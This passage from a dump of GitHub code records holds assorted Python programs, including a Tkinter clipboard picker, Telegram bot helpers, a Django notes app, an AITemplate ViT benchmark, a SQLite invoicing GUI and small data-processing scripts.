","repo_name":"jinwoov/IaC","sub_path":"pulumi-python-s3/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15472897466","text":"from tkinter import Tk, Listbox, \\\n EXTENDED, Button, END\nimport pyperclip\n\nclass Application:\n def __init__(self, clipboard):\n self.clipboard = clipboard\n \n def make_app(self):\n\n def get_list():\n sel = listbox.curselection()\n seltext = '\\n'.join([listbox.get(x) for x in sel])\n pyperclip.copy(seltext)\n app.destroy()\n\n def on_closing():\n pyperclip.copy(\"\")\n app.destroy()\n\n app = Tk()\n\n app.title(\"Буфер обмена\")\n\n width = app.winfo_screenwidth()\n height = app.winfo_screenheight()\n app.geometry(f'{int(width/2)}x{int(height/3.5)}')\n\n listbox = Listbox(app, selectmode = EXTENDED)\n listbox.grid(row=1, column=0, sticky=\"nsew\")\n\n button = Button(app, text = \"Вставить\", command = get_list, height=2)\n button.grid(row=2, column=0, sticky=\"nsew\")\n\n for text in self.clipboard:\n listbox.insert(END, text)\n\n listbox.selection_set(3)\n\n 
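The Pulumi record above relies on `mimetypes.guess_type` to set each S3 object's `content_type` from its file extension; without it, browsers would download `index.html` rather than render it. A quick stdlib-only illustration:

```python
import mimetypes

print(mimetypes.guess_type("www/index.html"))  # ('text/html', None)
print(mimetypes.guess_type("www/logo.png"))    # ('image/png', None)
```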
app.attributes('-topmost', True)\n app.update()\n app.attributes('-topmost', False)\n\n app.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n app.columnconfigure(0, weight=1)\n app.rowconfigure(1, weight=1)\n\n listbox.configure(background=\"#242424\", fg=\"white\")\n button.configure(background=\"#434343\", fg=\"white\")\n\n app.mainloop()","repo_name":"maksymDrv/CopyPaster","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11151810646","text":"from pyrogram import ReplyKeyboardMarkup, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom .api.pyroAPI import HelpBot\nfrom core.apps.abtest import services as abtest_services\nfrom core.apps.game.utils import game_dict, games_1\n\n\ndef send_msg(tg_id: int or str, text: str, session_name: str = None):\n client = HelpBot(session_name=session_name)\n client.send_msg(tg_id, text)\n\n\ndef broadcast(users: iter, message: str, keyboard: str):\n client = HelpBot(session_name=\"session_broadcast\")\n client.start()\n\n for user in users:\n try:\n if keyboard == \"start\":\n client.send_message(user.tg_id, message, reply_markup=_menu(user.tg_id))\n elif keyboard == \"games\":\n client.send_message(user.tg_id, message, reply_markup=_game_list(games_1, 0))\n elif keyboard == \"invite\":\n kb = InlineKeyboardMarkup([[InlineKeyboardButton(\"🤝 Пригласить друга\", switch_inline_query=\"start\")]])\n client.send_message(user.tg_id, message, reply_markup=kb)\n elif keyboard == \"deposit\":\n kb = InlineKeyboardMarkup([[InlineKeyboardButton(\"💳 Пополнить баланс\", callback_data=\"balance-buy_token\")]])\n client.send_message(user.tg_id, message, reply_markup=kb)\n elif keyboard == \"none\":\n client.send_message(user.tg_id, message)\n except:\n continue\n\n client.stop()\n\n\ndef _menu(tg_id: int):\n kb = ReplyKeyboardMarkup(\n [\n [abtest_services.get_text(tg_id, \"kb-games\")],\n [abtest_services.get_text(tg_id, \"kb-balance\"), abtest_services.get_text(tg_id, \"kb-help\")],\n [abtest_services.get_text(tg_id, \"kb-affiliate\")]\n ],\n resize_keyboard=True,\n )\n return kb\n\n\ndef _game_list(games, offset):\n kb_list = []\n if offset == 0:\n kb_list = [\n [InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-10\")]\n ]\n elif offset == 10:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-0\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-20\")]\n ]\n elif offset == 20:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-10\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-30\")]\n ]\n elif offset == 30:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-20\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\"),\n InlineKeyboardButton(f'⏩', callback_data=\"game-move-40\")]\n ]\n elif offset == 40:\n kb_list = [\n [InlineKeyboardButton(f'⏪', callback_data=\"game-move-30\"),\n InlineKeyboardButton(f'🔍 Поиск', callback_data=\"game-search\")]\n ]\n\n for game_id in games:\n game_title = games[game_id]\n emoji = game_dict[game_title][\"emoji\"]\n\n kb_list.append(\n [InlineKeyboardButton(f'{emoji} {game_title}', callback_data=f'game-{game_id}')])\n\n return InlineKeyboardMarkup(kb_list)\n\n\ndef get_tg_user(tg_id: int or str):\n client = 
HelpBot(session_name=\"get_tg_user_session\")\n client.start()\n\n tg_user = client.get_users(tg_id)\n user = {\n \"id\": tg_user.id,\n \"username\": \"[отсутствует]\",\n \"first_name\": \"[отсутствует]\",\n \"last_name\": \"[отсутствует]\",\n }\n\n if tg_user.username:\n user[\"username\"] = tg_user.username\n\n if tg_user.first_name:\n user[\"first_name\"] = tg_user.first_name\n\n if tg_user.last_name:\n user[\"last_name\"] = tg_user.last_name\n client.stop()\n return user\n","repo_name":"1337bot1337/games-bot","sub_path":"api/core/apps/helpbot/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17006974869","text":"from __future__ import annotations\nfrom abc import ABC, abstractmethod\nfrom src.graph.GraphModel import GraphModel\nfrom src.graph.DrawGraphConfig import DrawGraphConfig\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from src.ui.GraphCanvas import GraphCanvas\nfrom src.utils.Vector import Vector\nfrom src.graph.helpers.CanvasHelper import CanvasHelper\nfrom src.utils.Event import Event\nfrom copy import copy\n\nclass Draggable(ABC):\n @abstractmethod\n def drag(self, event):\n pass\n\n @abstractmethod\n def end_drag(self, event):\n pass\n\nclass DragCanvas(Draggable):\n def __init__(self, canvas: GraphCanvas, draw_config: DrawGraphConfig, graph: GraphModel):\n self.draging_node = None\n self.x = 0\n self.y = 0\n self.node_old_position: Vector | None = None\n self.canvas = canvas\n self.draw_config = draw_config\n self.graph = graph\n self.is_drag_node = True\n self.canvas_helper = CanvasHelper(self.canvas)\n self.on_element_move_end_event = Event()\n self.on_element_move_start_event = Event()\n\n def on_element_move(self, callback):\n self.on_element_move_end_event += callback\n \n def off_element_move(self, callback):\n self.on_element_move_end_event -= callback\n\n def on_element_move_start(self, callback):\n self.on_element_move_start_event += callback\n \n def off_element_move_start(self, callback):\n self.on_element_move_start_event -= callback\n\n def motion(self, event):\n self.canvas.change_cursor(event)\n\n def drag(self, event):\n if self.draging_node:\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n self.draging_node.position.x = x\n self.draging_node.position.y = y\n self.draging_node.is_dragged = True\n self.canvas.delete(\"all\")\n self.canvas.draw_edges(self.graph.edges)\n self.canvas.draw_nodes(self.graph.nodes)\n return\n\n self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n def drag_node(self, event):\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n \n for node in self.graph.nodes:\n if node.is_under_cursor(Vector(x, y)):\n self.draging_node = node\n self.node_old_position = copy(node.position)\n self.on_element_move_start_event(self.draging_node, Vector(x, y))\n self.graph.generator.set_dragged_edges(self.graph.edges, node)\n\n def drag_canvas(self, event):\n if not self.draging_node:\n self.canvas.scan_mark(event.x, event.y)\n\n def end_drag(self, event):\n if self.draging_node:\n x, y = self.canvas_helper.canvas_to_graph_coords(event.x, event.y)\n self.draging_node.is_dragged = False\n self.draging_node.width = self.draw_config.node_width\n self.graph.generator.set_dragged_edges(self.graph.edges, self.draging_node, False)\n self.on_element_move_end_event(self.draging_node, Vector(x, y), self.node_old_position)\n self.draging_node = None\n return\n\n 
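`DragCanvas` above subscribes and fires callbacks through `src.utils.Event` using `+=`/`-=` and call syntax; that class is not shown in this record, but a minimal implementation compatible with the usage would be (hypothetical sketch):

```python
class Event:
    def __init__(self):
        self._handlers = []

    def __iadd__(self, handler):       # enables: event += callback
        self._handlers.append(handler)
        return self

    def __isub__(self, handler):       # enables: event -= callback
        self._handlers.remove(handler)
        return self

    def __call__(self, *args, **kwargs):  # enables: event(node, pos, old_pos)
        for handler in list(self._handlers):
            handler(*args, **kwargs)
```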
self.canvas.scan_dragto(event.x, event.y, gain=1)\n\n","repo_name":"GenWattStudent/Grafy","sub_path":"src/graph/drag/DragCanvas.py","file_name":"DragCanvas.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11127479597","text":"import os\nimport sys\n\nfrom repology.package import Package\n\n\nclass HaikuPortsFilenamesParser():\n def __init__(self):\n pass\n\n def Parse(self, path):\n result = []\n\n for category in os.listdir(path):\n category_path = os.path.join(path, category)\n if not os.path.isdir(category_path):\n continue\n\n for package in os.listdir(category_path):\n package_path = os.path.join(category_path, package)\n if not os.path.isdir(package_path):\n continue\n\n for recipe in os.listdir(package_path):\n if not recipe.endswith('.recipe'):\n continue\n\n pkg = Package()\n\n pkg.name = package\n pkg.category = category\n\n # may want to shadow haiku-only ports\n #if pkg.category.startswith('haiku-'):\n # pkg.shadow = True\n\n # it seems to be guaranteed there's only one hyphen in recipe filename\n name, version = recipe[:-7].split('-', 1)\n\n if package.replace('-', '_') != name:\n print('WARNING: mismatch for package directory and recipe name: {} != {}'.format(package, name), file=sys.stderr)\n\n pkg.version = version\n\n result.append(pkg)\n\n return result\n","repo_name":"roscopecoltran/sniperkit-services","sub_path":"dockerfiles/vcs/packages/repology/repology/parser/haiku.py","file_name":"haiku.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"74313206249","text":"#!/usr/bin/python3\n\"\"\"\nimport modules\n\"\"\"\nimport unittest\nfrom models.rectangle import Rectangle\n\"\"\"\ntest for __str__\n\"\"\"\n\n\nclass test_str(unittest.TestCase):\n \"\"\"Test on __str___ \"\"\"\n def test_str(self):\n \"\"\"test for __str__ method\"\"\"\n r = Rectangle(4, 6, 2, 1, 12)\n res = \"[Rectangle] (12) 2/1 - 4/6\"\n self.assertEqual(r.__str__(), res)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"IyasuH/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_rectangle_6.py","file_name":"test_rectangle_6.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19816617960","text":"import os\n\nimport click\nimport numpy as np\nimport torch\nfrom aitemplate.compiler import compile_model, Model\n\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.testing import detect_target\n\nfrom modeling.vision_transformer import VisionTransformer\nfrom weight_utils import export_to_torch_tensor\n\n# flake8: noqa\n\n\ndef mark_output(y):\n if type(y) is not tuple:\n y = (y,)\n for i in range(len(y)):\n y[i]._attrs[\"is_output\"] = True\n y[i]._attrs[\"name\"] = \"output_%d\" % (i)\n y_shape = [d._attrs[\"values\"][0] for d in y[i]._attrs[\"shape\"]]\n print(\"output_{} shape: {}\".format(i, y_shape))\n\n\nUSE_CUDA = detect_target().name() == \"cuda\"\n\n\ndef compile_vit(\n model_name,\n batch_size,\n class_token=False,\n global_pool=\"avg\",\n use_fp16_acc=True,\n):\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n if model_name == \"vit_base_patch16_224\":\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n elif model_name == \"vit_large_patch16_384\":\n img_size = 
384\n patch_size = 16\n embed_dim = 1024\n num_heads = 16\n depth = 24\n seqlen = (img_size // patch_size) ** 2 + (1 if class_token else 0)\n ait_model = VisionTransformer(\n batch_size=batch_size,\n img_size=img_size,\n class_token=class_token,\n global_pool=global_pool,\n num_heads=num_heads,\n embed_dim=embed_dim,\n patch_size=patch_size,\n depth=depth,\n act_layer=\"GELU\",\n )\n ait_model.name_parameter_tensor()\n inputs_ait = Tensor(\n [batch_size, img_size, img_size, 3], name=\"input0\", is_input=True\n )\n Y = ait_model(inputs_ait)\n mark_output(Y)\n\n target = detect_target(use_fp16_acc=use_fp16_acc)\n exe_module = compile_model(\n Y, target, \"./tmp\", \"vision_transformer_bs%d_seq%d\" % (batch_size, seqlen)\n )\n return exe_module\n\n\ndef benchmark(model_name, batch_size, mod=None, graph_mode=True):\n # load mod\n if model_name == \"vit_base_patch16_224\":\n img_size = 224\n patch_size = 16\n embed_dim = 768\n num_heads = 12\n depth = 12\n elif model_name == \"vit_large_patch16_384\":\n img_size = 384\n patch_size = 16\n embed_dim = 1024\n num_heads = 16\n depth = 24\n else:\n raise NotImplementedError\n\n seqlen = (img_size // patch_size) ** 2\n\n if mod is None:\n model_dir = f\"vision_transformer_bs{batch_size}_seq{seqlen}\"\n mod = Model(os.path.join(\"./tmp\", model_dir, \"test.so\"))\n\n # prepare params\n params_ait = export_to_torch_tensor(model_name)\n if detect_target().name() == \"cuda\":\n ait_key = \"attn_cu_length\"\n for i in range(depth):\n prefix = \"blocks_%d\" % (i)\n cu_len = np.cumsum([0] + [seqlen] * batch_size).astype(\"int32\")\n params_ait[f\"{prefix}_{ait_key}\"] = torch.from_numpy(cu_len).cuda()\n\n # set weights\n mod.set_many_constants_with_tensors(params_ait)\n mod.fold_constants(sync=True)\n\n # prepare input/output tensor\n inputs = [torch.randn([batch_size, img_size, img_size, 3]).cuda().half()]\n ys = []\n num_outputs = len(mod.get_output_name_to_index_map())\n for i in range(num_outputs):\n shape = mod.get_output_maximum_shape(i)\n ys.append(torch.empty(shape).cuda().half())\n # warm up\n t, _, __ = mod.benchmark_with_tensors(\n inputs,\n ys,\n count=100,\n repeat=4,\n graph_mode=graph_mode,\n )\n # benchmark\n t, _, __ = mod.benchmark_with_tensors(\n inputs,\n ys,\n count=100,\n repeat=4,\n graph_mode=graph_mode,\n )\n print(f\"batch_size: {batch_size}, latency: {t}\")\n dev_flag = os.environ.get(\"HIP_VISIBLE_DEVICES\", \"-1\")\n dev_flag = dev_flag.replace(\",\", \"_\")\n with open(f\"{model_name}_ait_benchmark_dev_{dev_flag}.txt\", \"a\") as f:\n f.write(f\"batch_size: {batch_size}, latency: {t}\\n\")\n\n\n@click.command()\n@click.option(\"--model-name\", type=str, default=\"vit_base_patch16_224\")\n@click.option(\n \"--use-fp16-acc\",\n type=bool,\n default=True,\n help=\"Whether to use FP16 for accumulation (similar to TensorRT)\",\n)\n@click.option(\"--use-graph\", type=bool, default=True, help=\"Whether to use CUDA graph\")\n@click.option(\"--batch-size\", type=int, default=0, help=\"Batch size\")\ndef main(\n model_name=\"vit_base_patch16_224\", use_fp16_acc=True, use_graph=True, batch_size=0\n):\n if detect_target().name() == \"rocm\":\n use_graph = False\n if batch_size < 1:\n for bs in (1, 2, 4, 8, 16, 32, 64, 128, 256):\n compile_vit(model_name, bs, use_fp16_acc=use_fp16_acc)\n benchmark(model_name, bs, graph_mode=use_graph)\n else:\n benchmark(model_name, batch_size, graph_mode=use_graph)\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"facebookincubator/AITemplate","sub_path":"examples/04_vit/benchmark_ait.py","file_name":"benchmark_ait.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"10732014565","text":"from django.shortcuts import render ,redirect , get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom .models import Note\nfrom .forms import NoteForm\nfrom django.contrib import messages\nfrom accounts.models import Profile\n\n\n# Create your views here.\n\ndef all_notes(request):\n if request.user.is_authenticated: \n user = request.user\n profile = get_object_or_404(Profile,user=user)\n all_notes = Note.objects.filter(user=user)\n context = {\n 'all_notes': all_notes,\n 'profile':profile\n }\n return render(request,'notes.html',context)\n else:\n return redirect('/accounts/login')\n\ndef note_details(request,slug):\n note = Note.objects.get(slug=slug)\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n context={\n 'note':note,\n 'profile':profile\n }\n \n return render(request,'one_note.html',context)\n else:\n context={\n 'note':note,\n \n }\n \n return render(request,'one_note.html',context)\n\ndef add_notes(request):\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n if request.method == 'POST':\n form = NoteForm(request.POST,request.FILES) # constructor\n\n if form.is_valid():\n new_form = form.save(commit=False) # class instance or object\n new_form.user = request.user\n new_form.save()\n messages.success(request,'Note has been created successfully.') \n return redirect('/notes')\n else:\n form = NoteForm() \n\n else:\n return redirect('/accounts/login')\n\n context = {\n 'form':form,\n 'profile':profile\n }\n\n return render(request,'add_note.html',context)\n \ndef note_edit(request,slug):\n if request.user.is_authenticated:\n user = request.user\n profile = get_object_or_404(Profile,user=user)\n note = Note.objects.get(slug=slug)\n if request.method == 'POST': #means you clicked the button :D\n form = NoteForm(request.POST,request.FILES,instance=note)\n \n if form.is_valid():\n new_form = form.save(commit=False) # class instance or object\n new_form.user = request.user\n new_form.save()\n messages.success(request, 'Note has been updated successfully.') \n return redirect('/notes')\n else:\n form = NoteForm(instance=note) \n\n context = {\n 'form':form,\n 'profile':profile\n }\n\n return render(request,'edit_note.html',context)\n else:\n return redirect('/accounts/login')\n","repo_name":"wafaaxdev/NotesApp","sub_path":"notes_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74949955368","text":"import math\ndef sd_function(numbers):\n 'self-defined sd function'\n N=len(numbers)\n summation = 0\n another_summation = 0\n for number in numbers:\n summation += number\n mu = summation / N\n for number in numbers:\n another_summation += (number - mu)**2\n return(math.sqrt(another_summation/N)) \nmy_list = range(1,6)\nprint(sd_function(my_list))\n\nhelp(sd_function)","repo_name":"Tingparticle/midterm-hw2","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"13376098950","text":"import pandas as pd\n\ncoin_list = ['BCH', 'Cardona', 'dogecoin', 'EOS', 'ETH', 'LTC', 'XRP', 'BNB']\n\ndfSubRed = pd.DataFrame()\ndfNA = pd.DataFrame()\nfor scoin in coin_list:\n dfTemp = pd.read_csv(scoin + '_sentiment.csv', index_col=0)\n dfSubRed = pd.concat([dfSubRed,pd.DataFrame(dfTemp.subreddit.value_counts()[:15].index),pd.DataFrame(dfTemp.subreddit.value_counts()[:15].values)], axis=1)\n\n\ndfNA = pd.read_csv('Monero_sentiment.csv', index_col=0)\ndfNA['body'].isna().sum()\n\n# initialize sentiment classifier\nsia = SIA()\n\n# get sentiment\nsentiment = dfTemp['body'].apply(sia.polarity_scores)\n\n# create sentiment df\nsentiment = pd.DataFrame(sentiment.tolist())\ndfTemp = dfTemp.reset_index(drop = True)\n# merge sentiment with your df\n\ndf = dfTemp.merge(sentiment, how='left', left_index=True, right_index=True) # Her den kommer fejlen!\ndf['sentiment'] = df['compound'].apply(categorize_sentiment)\ndf['sentiment'] = pd.Categorical(df['sentiment'])\nbinary_sentiment = df['sentiment'].str.get_dummies()\n\ndf = df.merge(binary_sentiment, how='left', left_index=True, right_index=True)","repo_name":"emborg60/EAP_EF","sub_path":"Kode/Subreddit check.py","file_name":"Subreddit check.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72921481128","text":"from Facturas import Facturas\nimport ttkbootstrap as ttk\nfrom ttkbootstrap.constants import *\nfrom tkinter import messagebox\nfrom datetime import date\nimport sqlite3\nimport os\n\ndef main():\n\n proyecto = os.path.dirname(os.path.abspath(__file__))\n os.chdir(proyecto)\n \n facturas = Facturas()\n\n conn = sqlite3.connect('./facturas.db')\n cursor = conn.cursor()\n \n root = ttk.Window(themename=\"minty\")\n root.title(\"Facturas\")\n root.geometry(\"400x380\")\n root.resizable(False, False)\n\n # Sections\n program = ttk.Frame(root)\n program.pack()\n \n # Functions\n def generarFactura():\n try:\n nombreEmisor = str(emisor.get())\n \n nombreCliente = str(cliente.get())\n cliente.delete(0, \"end\")\n \n consumokWh = int(consumido.get())\n consumido.delete(0, \"end\")\n \n precio = round(facturas.nuevaFactura(consumokWh), 3)\n \n conn.execute('''INSERT INTO listaFacturas (Emisor, Cliente, Consumo_kWh, Precio) VALUES (?, ?, ?, ?)''', (nombreEmisor, nombreCliente, consumokWh, precio))\n conn.commit()\n\n except ValueError:\n messagebox.showinfo(title=\"Error\", message=\"Asegurate de que ingresar el tipo de dato correspondiente y de no dejar espacios vacios.\")\n\n # Nueva ventana \n def verFacturas():\n \n ventanaFacturas = ttk.Toplevel(pady=(10))\n ventanaFacturas.title(\"Lista de Facturas\")\n ventanaFacturas.geometry(\"400x450\")\n ventanaFacturas.resizable(False, False)\n \n # Nueva ventana\n def factura(event):\n \n # Widgets dentro de la ventana\n factura = ttk.Toplevel(padx=10, pady=10)\n factura.title(\"Factura\")\n factura.geometry(\"250x310\")\n factura.resizable(False, False)\n \n itemSeleccionado = event.widget.selection()[0]\n columnaId = event.widget.item(itemSeleccionado, \"values\")[0]\n \n cursor.execute(f\"SELECT Fecha, Cliente, Emisor, Consumo_kWh, Precio FROM listaFacturas WHERE idFactura={columnaId}\")\n datos = cursor.fetchone()\n \n titulo = ttk.Label(factura, text=\"FACTURA\", font=(\"Helvetica\", 20, \"bold\"))\n titulo.pack()\n \n fecha = ttk.Label(factura, text=datos[0], font=(\"Helvetica\", 13))\n fecha.pack()\n \n clienteString = 
f\"\\nCliente\\n{datos[1]}\\n\\nConsumió\"\n cliente = ttk.Label(factura, text=clienteString, font=(\"Helvetica\", 13))\n cliente.pack()\n cliente.configure(justify=\"center\", anchor=\"center\")\n \n consumoString = f\"{datos[3]}kWh\"\n consumo = ttk.Label(factura, text=consumoString, font=(\"Helvetica\", 13, \"bold\"))\n consumo.pack()\n consumo.configure(justify=\"center\", anchor=\"center\")\n \n precioString = f\"\\nDebe pagar RD${datos[4]}\"\n precio = ttk.Label(factura, text=precioString, font=(\"Helvetica\", 13))\n precio.pack()\n precio.configure(justify=\"center\", anchor=\"center\")\n \n emisorString = f\"\\nFue atendido por:\\n{datos[2]}\\n\"\n emisor = ttk.Label(factura, text=emisorString, font=(\"Helvetica\", 13))\n emisor.pack()\n emisor.configure(justify=\"center\", anchor=\"center\")\n \n # Funciones\n def cargarFilas():\n cursor.execute(f\"SELECT idFactura, Cliente, Fecha FROM listaFacturas\")\n fila = cursor.fetchone()\n \n while fila != None:\n tabla.insert(parent=\"\", index=\"end\", values=(fila[0], fila[1], fila[2]))\n fila = cursor.fetchone()\n \n def recargar():\n tabla.delete(*tabla.get_children())\n cargarFilas()\n \n # Tabla\n tabla = ttk.Treeview(ventanaFacturas, columns=(\"ID\", \"cliente\", \"fecha\"), bootstyle=\"INFO\", height=\"20\")\n \n tabla.heading(\"ID\", text=\"ID\", anchor=\"w\")\n tabla.heading(\"cliente\", text=\"Clientes\", anchor=\"w\")\n tabla.heading(\"fecha\", text=\"Fecha\", anchor=\"w\")\n \n tabla.column(\"#0\", width=0, stretch=False)\n tabla.column(\"ID\", width=\"80\")\n tabla.column(\"cliente\", width=\"150\")\n tabla.column(\"fecha\", width=\"120\")\n \n tabla.bind(\"\", factura)\n \n tabla.pack(padx=20, pady=5)\n \n cargarFilas()\n \n # Widgets dentro de la ventana\n footer = ttk.Label(ventanaFacturas, text=\"Haz doble clic en cualquiera de los clientes para visualizar su factura\")\n footer.pack(pady=\"10\")\n \n recargar = ttk.Button(ventanaFacturas, text=\"Recargar\", command=recargar, padding=(20, 10))\n recargar.pack(pady=\"5\")\n \n \n # Widgets\n fechaActual = date.today().strftime(\"%d/%m/%Y\")\n fecha = ttk.Label(program, text=fechaActual, font=(\"Helvetica\", 12, \"bold\"), padding=(0, 15, 0, 10))\n fecha.pack()\n \n emisorTitle = ttk.Label(program, text=\"Ingrese su nombre *\", font=(\"Helvetica\", 12), padding=(0, 0, 0, 15))\n emisorTitle.pack()\n \n emisor = ttk.Entry(program, width=\"40\")\n emisor.pack()\n \n clienteTitle = ttk.Label(program, text=\"Ingrese el nombre del cliente *\", font=(\"Helvetica\", 12), padding=(0, 15, 0, 15))\n clienteTitle.pack()\n \n cliente = ttk.Entry(program, width=\"40\")\n cliente.pack()\n \n consumidoTitle = ttk.Label(program, text=\"¿Cuánto consumió el cliente? 
*\", font=(\"Helvetica\", 12), padding=(0, 15, 0, 15))\n consumidoTitle.pack()\n \n consumido = ttk.Entry(program, width=\"40\")\n consumido.pack(pady=\"0, 30\")\n \n generarFactura = ttk.Button(program, text=\"Generar Factura\", padding=(20, 10), command=generarFactura)\n generarFactura.pack(side=LEFT, padx=\"0, 10\")\n \n verFacturas = ttk.Button(program, text=\"Ver Facturas\", bootstyle=\"INFO\", padding=(30, 10), command=verFacturas)\n verFacturas.pack(side=RIGHT, padx=\"10, 0\")\n \n root.mainloop()\n \nif __name__ == \"__main__\":\n main()","repo_name":"L1nk01/Facturas","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":6132,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69820255210","text":"from typing import Callable\n\n\nclass pipe:\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n\n def __add__(self, other):\n ...\n\n def __or__(self, other):\n # print(f'__or__: {other=}')\n\n if isinstance(other, pipe) and len(other.args) == 1 and isinstance(other.args[0], Callable):\n return other(*self.args, **self.kwargs)\n elif isinstance(other, pipe):\n return pipe(*self.args, *other.args, **{**self.kwargs, **other.kwargs})\n elif isinstance(other, Callable):\n return other(*self.args, **self.kwargs)\n\n else:\n raise TypeError(f\"unsupported operand type(s) for |: '{type(other)}' and '{type(self)}'\")\n\n def __ror__(self, other):\n # print(f'__ror__: {other=}')\n\n if len(self.args) == 1 and isinstance(self.args[0], Callable):\n return self(other)\n elif isinstance(other, pipe):\n return pipe((*other.args, *self.args), {**other.kwargs, **self.kwargs})\n else:\n return pipe(other)\n\n def __call__(self, *args, **kwargs):\n func = self.args[0]\n assert isinstance(func, Callable)\n return pipe(func(*args, **kwargs))\n\n\nif __name__ == '__main__':\n [i for i in range(100)] | pipe(sum) | print\n\n # pipe(1, foo=1) | pipe(2, bar=2) | (lambda *args, **kwargs: pipe(str(args) + \" \" + str(kwargs))) | print\n","repo_name":"ValentinKolb/playground","sub_path":"pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22289510747","text":"import json\nimport csv\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress\nimport os\nimport numpy as np\nfrom scipy import interpolate\nfrom statistics import *\n\ndef traitement(name, y):\n list_dir = os.listdir(name)\n coords = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n try:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n coord = (data[\"nb_nodes\"], data[y])\n coords.append(coord)\n except:\n print(\"oups\", dir, dir2)\n return coords\n\n\ndef traitement_nodes(name, x, y):\n list_dir = os.listdir(name)\n coords = []\n for dir in list_dir:\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n print(dir, dir2)\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n for n in data[x]:\n coord = (data[x][n], data[y][n])\n coords.append(coord)\n return coords\n\n\ndef traitement_nb_nodes_minmoymaxvar(name, n, y):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n if dir.startswith('n' + str(n)):\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + 
dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n if data[\"nb_nodes\"] == n:\n l.append(data[y])\n return min(l), mean(l), max(l), variance(l)\n\n\ndef traitement_par_nb_nodes(name, y, nb_max):\n coords = []\n for n in range(3, nb_max + 1):\n coords.append(traitement_nb_nodes_minmoymaxvar(name, n, y))\n return coords\n\n\ndef traitement_nb_nodes(name, n, y):\n list_dir = os.listdir(name)\n l = []\n for dir in list_dir:\n if dir.startswith('n' + str(n)):\n list_dir2 = os.listdir(name + '/' + dir)\n for dir2 in list_dir2:\n with open(name + '/' + dir + '/' + dir2 + '/data.txt') as json_file:\n data = json.load(json_file)\n if data[\"nb_nodes\"] == n:\n l.append(data[y])\n return l\n\n\ndef traitement_par_nb_nodes_list(list, y, nb_max):\n coords = []\n for n in range(3, nb_max + 1):\n l = []\n mini = []\n moy = []\n maxi = []\n var = []\n for name in list:\n try:\n coord = traitement_nb_nodes_minmoymaxvar(name, n, y)\n mini.append(coord[0])\n moy.append(coord[1])\n maxi.append(coord[2])\n var.append(coord[3])\n except:\n print(\"oups\", name, n)\n 